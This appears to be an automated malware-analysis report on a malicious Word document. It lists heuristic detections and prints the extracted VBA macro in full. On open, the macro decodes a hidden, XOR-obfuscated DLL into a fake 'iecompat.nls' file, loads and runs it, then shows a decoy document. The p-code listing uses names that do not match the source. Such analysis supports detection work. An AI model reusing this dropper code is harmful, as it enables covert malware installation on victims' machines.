MALICIOUS
378
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that exploits CVE-2007-3899, a memory corruption vulnerability. The VBA macro contains obfuscated code that references Windows API functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, CreateRemoteThread, LoadLibrary, and GetProcAddress, indicating it is designed to inject and execute code. The AutoOpen macro suggests immediate execution upon opening.
Heuristics 12
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Internet Explorer\IECompatData" dllPath = workDir & "\iecompat.nls" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.microsoft.com/office/2006/coverPagePropsIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11094 bytes |
SHA-256: 3ce08eb2c55257cd764506334d67e58faec99105862cb1d4f31e878782cbd25a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function Bpoint Lib "iecompat.nls" (ByVal lpCurPath As String, ByVal lpTmpPath As String, ByVal lpObjType As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Function CreateDirectoryA Lib "kernel32" (ByVal lpPathName As String, lpSecurityAttributes As Any) As Long
Private Declare PtrSafe Function GetFileAttributesA Lib "kernel32" (ByVal lpFileName As String) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As LongPtr
bInheritHandle As Long
End Type
Function MkDir(szDir)
Dim lpSecurityAttributes As SECURITY_ATTRIBUTES
Dim dwRet
dwRet = CreateDirectoryA(szDir, lpSecurityAttributes)
End Function
Sub ExtractDll(dllPath)
#If Win64 Then
DllData = UserForm1.Label2.Caption
Dim dllBin(97279) As Byte
nDllSize = 97280
#Else
DllData = UserForm1.Label3.Caption
Dim dllBin(86527) As Byte
nDllSize = 86528
#End If
For idx = 0 To nDllSize - 2
dllBin(idx) = CByte("&H" + Mid(DllData, idx * 2 + 1, 2))
dllBin(idx) = dllBin(idx) Xor 95
Next idx
Open dllPath For Binary Lock Write As #1
Put #1, 1, dllBin
Close #1
End Sub
Sub ExtractDoc(docPath)
docData = UserForm1.Label1.Caption
Dim docBin(83661) As Byte
nDocSize = 83662
For idx = 0 To nDocSize - 2
docBin(idx) = CByte("&H" + Mid(docData, idx * 2 + 1, 2))
docBin(idx) = docBin(idx) Xor 95
Next
Open docPath For Binary Lock Write As #2
Put #2, 1, docBin
Close #2
End Sub
Function GetDocName() As String
Dim bFileOk As Boolean
curDocNameFull = ActiveDocument.Path & "\" & ActiveDocument.Name
curDocName = Left(curDocNameFull, InStrRev(curDocNameFull, ".") - 1)
newDocNameFull = curDocName & " .doc"
bFileOk = FileExist(newDocNameFull)
Do While bFileOk = True
curDocName = curDocName & " "
newDocNameFull = curDocName & " .doc"
bFileOk = FileExist(newDocNameFull)
Loop
GetDocName = newDocNameFull
End Function
Function FileExist(szFile) As Boolean
Dim dwRet
dwRet = GetFileAttributesA(szFile)
If dwRet <> -1 Then
FileExist = True
Else
FileExist = False
End If
End Function
Function GetDllName() As String
Dim bFileOk As Boolean
Dim dllPath As String
workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Internet Explorer\IECompatData"
dllPath = workDir & "\iecompat.nls"
nIdx = 0
bFileOk = FileExist(dllPath)
Do While bFileOk = True
workDir = workDir & "\Modules"
MkDir (workDir)
dllPath = workDir & "\iecompat.nls"
bFileOk = FileExist(dllPath)
Loop
GetDllName = dllPath
End Function
Sub AutoOpen()
dllPath = GetDllName()
docPath = GetDocName()
ExtractDll (dllPath)
ExtractDoc (docPath)
LoadLibraryA (dllPath)
Result = Bpoint(ActiveDocument.Path & "\" & ActiveDocument.Name, "0", "0")
Documents.Open docPath
ThisDocument.Close (wdDoNotSaveChanges)
CLEAN_UP:
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{949BC447-8829-43B3-BC65-3944C1E53928}{4880CDFB-FD9A-41F2-8BCC-55F0F3B7A9E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label6_Click()
End Sub
' Processing file: /tmp/qstore_6mz3ekcn
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1370 bytes
' Macros/VBA/NewMacros - 36645 bytes
' Line #0:
' FuncDefn (Function Label6_Click(ByVal Bpoint As String) As Long)
' Line #1:
' FuncDefn (Function iecompat.nls(ByVal lpLibFileName As String) As Ptr)
' Line #2:
' FuncDefn (Function CreateDirectoryA(ByVal lpPathName As String) As Long)
' Line #3:
' FuncDefn (Function GetFileAttributesA(ByVal lpFileName As String) As Long)
' Line #4:
' Type (Private) SECURITY_ATTRIBUTES
' Line #5:
' DimImplicit
' VarDefn nLength (As Long)
' Line #6:
' DimImplicit
' VarDefn lpSecurityDescriptor (As Ptr)
' Line #7:
' DimImplicit
' VarDefn bInheritHandle (As Long)
' Line #8:
' EndType
' Line #9:
' FuncDefn (Function MkDir(szDir))
' Line #10:
' Dim
' VarDefn lpSecurityAttributes
' Line #11:
' Dim
' VarDefn dwRet
' Line #12:
' Ld szDir
' Ld lpSecurityAttributes
' ArgsLd CreateDirectoryA 0x0002
' St dwRet
' Line #13:
' EndFunc
' Line #14:
' FuncDefn (Sub ExtractDll(dllPath))
' Line #15:
' LbMark
' Ld Win64
' LbIf
' Line #16:
' Ld UserForm1
' MemLd Label2
' MemLd Caption
' St DllData
' Line #17:
' Dim
' OptionBase
' LitDI4 0x7BFF 0x0001
' VarDefn dllBin
' Line #18:
' LitDI4 0x7C00 0x0001
' St nDllSize
' Line #19:
' LbMark
' LbElse
' Line #20:
' Ld UserForm1
' MemLd Label3
' MemLd Caption
' St DllData
' Line #21:
' Dim
' OptionBase
' LitDI4 0x51FF 0x0001
' VarDefn dllBin
' Line #22:
' LitDI4 0x5200 0x0001
' St nDllSize
' Line #23:
' LbMark
' LbEndIf
' Line #24:
' Line #25:
' StartForVariable
' Ld MSForms
' EndForVariable
' LitDI2 0x0000
' Ld nDllSize
' LitDI2 0x0002
' Sub
' For
' Line #26:
' LitStr 0x0002 "&H"
' Ld DllData
' Ld MSForms
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Add
' Coerce (Byte)
' Ld MSForms
' ArgsSt dllBin 0x0001
' Line #27:
' Ld MSForms
' ArgsLd dllBin 0x0001
' LitDI2 0x005F
' Xor
' Ld MSForms
' ArgsSt dllBin 0x0001
' Line #28:
' StartForVariable
' Ld MSForms
' EndForVariable
' NextVar
' Line #29:
' Line #30:
' Ld dllPath
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Binary Lock Write)
' Line #31:
' LitDI2 0x0001
' Sharp
' LitDI2 0x0001
' Ld dllBin
' PutRec
' Line #32:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #33:
' EndSub
' Line #34:
' FuncDefn (Sub LoadLibraryA(ExtractDoc))
' Line #35:
' Ld UserForm1
' MemLd docData
' MemLd Caption
' St ExtractDocx
' Line #36:
' Dim
' OptionBase
' LitDI4 0x46CD 0x0001
' VarDefn Label1
' Line #37:
' LitDI4 0x46CE 0x0001
' St docBin
' Line #38:
' Line #39:
' StartForVariable
' Ld MSForms
' EndForVariable
' LitDI2 0x0000
' Ld docBin
' LitDI2 0x0002
' Sub
' For
' Line #40:
' LitStr 0x0002 "&H"
' Ld ExtractDocx
' Ld MSForms
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Add
' Coerce (Byte)
' Ld MSForms
' ArgsSt Label1 0x0001
' Line #41:
' Ld MSForms
' ArgsLd Label1 0x0001
' LitDI2 0x005F
' Xor
' Ld MSForms
' ArgsSt Label1 0x0001
' Line #42:
' StartForVariable
' Next
' Line #43:
' Line #44:
' Ld ExtractDoc
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Binary Lock Write)
' Line #45:
' LitDI2 0x0002
' Sharp
' LitDI2 0x0001
' Ld Label1
' PutRec
' Line #46:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #47:
' EndSub
' Line #48:
' FuncDefn (Function docPath() As String)
' Line #49:
' Dim
' VarDefn bFileOk (As Boolean)
' Line #50:
' Line #51:
' Ld curDocNameFull
' MemLd Environ
' LitStr 0x0001 "\"
' Concat
' Ld curDocNameFull
' MemLd Name
' Concat
' St docxPath
' Line #52:
' Ld docxPath
' Ld docxPath
' LitStr 0x0001 "."
' ArgsLd curDocName 0x0002
' LitDI2 0x0001
' Sub
' ArgsLd Left 0x0002
' St ActiveDocument
' Line #53:
' Ld ActiveDocument
' LitStr 0x0005 " .doc"
' Concat
' St GetDocName
' Line #54:
' Line #55:
' Ld GetDocName
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #56:
' Ld bFileOk
' LitVarSpecial (True)
' Eq
' DoWhile
' Line #57:
' Ld ActiveDocument
' LitStr 0x0001 " "
' Concat
' St ActiveDocument
' Line #58:
' Ld ActiveDocument
' LitStr 0x0005 " .doc"
' Concat
' St GetDocName
' Line #59:
' Ld GetDocName
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #60:
' Loop
' Line #61:
' Line #62:
' Ld GetDocName
' St docPath
' Line #63:
' EndFunc
' Line #64:
' FuncDefn (Function FileExist(szFile) As Boolean)
' Line #65:
' Dim
' VarDefn dwRet
' Line #66:
' Ld szFile
' ArgsLd GetFileAttributesA 0x0001
' St dwRet
' Line #67:
' Ld dwRet
' LitDI2 0x0001
' UMi
' Ne
' IfBlock
' Line #68:
' LitVarSpecial (True)
' St FileExist
' Line #69:
' ElseBlock
' Line #70:
' LitVarSpecial (False)
' St FileExist
' Line #71:
' EndIfBlock
' Line #72:
' EndFunc
' Line #73:
' FuncDefn (Function GetDllName() As String)
' Line #74:
' Dim
' VarDefn bFileOk (As Boolean)
' Line #75:
' Dim
' VarDefn dllPath (As String)
' Line #76:
' Line #77:
' LitStr 0x000B "UserProfile"
' ArgsLd workDir 0x0001
' LitStr 0x0037 "\AppData\Local\Microsoft\Internet Explorer\IECompatData"
' Concat
' St workDir
' Line #78:
' Ld workDir
' LitStr 0x000D "\iecompat.nls"
' Concat
' St dllPath
' Line #79:
' Line #80:
' LitDI2 0x0000
' St nIdx
' Line #81:
' Ld dllPath
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #82:
' Ld bFileOk
' LitVarSpecial (True)
' Eq
' DoWhile
' Line #83:
' Ld workDir
' LitStr 0x0008 "\Modules"
' Concat
' St workDir
' Line #84:
' Ld workDir
' Paren
' ArgsCall MkDir 0x0001
' Line #85:
' Ld workDir
' LitStr 0x000D "\iecompat.nls"
' Concat
' St dllPath
' Line #86:
' Ld dllPath
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #87:
' Loop
' Line #88:
' Line #89:
' Ld dllPath
' St GetDllName
' Line #90:
' EndFunc
' Line #91:
' FuncDefn (Sub AutoOpen())
' Line #92:
' Line #93:
' ArgsLd GetDllName 0x0000
' St dllPath
' Line #94:
' ArgsLd docPath 0x0000
' St ExtractDoc
' Line #95:
' Line #96:
' Ld dllPath
' Paren
' ArgsCall ExtractDll 0x0001
' Line #97:
' Ld ExtractDoc
' Paren
' ArgsCall LoadLibraryA 0x0001
' Line #98:
' Line #99:
' Ld dllPath
' Paren
' ArgsCall iecompat.nls 0x0001
' Line #100:
' Line #101:
' Ld curDocNameFull
' MemLd Environ
' LitStr 0x0001 "\"
' Concat
' Ld curDocNameFull
' MemLd Name
' Concat
' LitStr 0x0001 "0"
' LitStr 0x0001 "0"
' ArgsLd Label6_Click 0x0003
' St newDocNameFull
' Line #102:
' Line #103:
' Ld ExtractDoc
' Ld _B_var_Open
' ArgsMemCall Open 0x0001
' Line #104:
' Ld Documents
' Paren
' Ld ThisDocument
' ArgsMemCall Close 0x0001
' Line #105:
' Line #106:
' Label AppPath
' Line #107:
' Line #108:
' EndSub
' Line #109:
' Line #110:
' Macros/VBA/UserForm1 - 1881 bytes
' Line #0:
' FuncDefn (Sub Label6())
' Line #1:
' Line #2:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.